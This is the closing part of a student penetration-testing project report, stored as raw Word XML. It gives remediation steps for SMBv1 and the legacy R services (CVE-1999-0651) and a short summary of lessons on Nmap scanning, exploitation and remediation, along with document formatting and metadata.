    <w:p w14:paraId="22F99356" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Disable SMBv1 and restrict access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B961671" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="190"/>
        <w:ind w:hanging="197"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>R Services (Ports 512-514)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7E2D7" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Plaintext credentials </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>(CVE-1999-0651)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F61A44" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A531B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Disable rsh, rlogin, and rexec services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3319B0" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="435"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Major Learnings from the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D3779" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Through this project, I learned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F60230" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>How to perform network scanning and enumeration using Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEAE20" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="545"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques for exploiting vulnerabilities in services like FTP, SMB, and R services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2ACE6C" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="320"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>The importance of remediation to secure systems against attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E0C67" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="375" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>This hands-on experience deepened my understanding of ethical hacking and cybersecurity best practices.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006173E6">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1439" w:right="1809" w:bottom="1527" w:left="18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TC">
    <w:panose1 w:val="02020200000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="2000028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71AD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AAE4998"/>
    <w:lvl w:ilvl="0" w:tplc="BE86A036">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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5291C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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347B24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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02978A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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C8FA00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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7CFAEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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B0C03A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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D224F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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C05FC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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205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3E6"/>
    <w:rsid w:val="00046C56"/>
    <w:rsid w:val="006173E6"/>
    <w:rsid w:val="00A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B504"/>
  <w15:docId w15:val="{6C4087BE-85C0-4DA8-855B-68ED680B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6" w:line="265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7" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:right="767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nvd.nist.gov/vuln/detail/CVE-1999-065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nvd.nist.gov/vuln/detail/CVE-2007-24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nvd.nist.gov/vuln/detail/CVE-2011-2523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DIVAKAR MANDAL</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-03T16:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-03T16:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>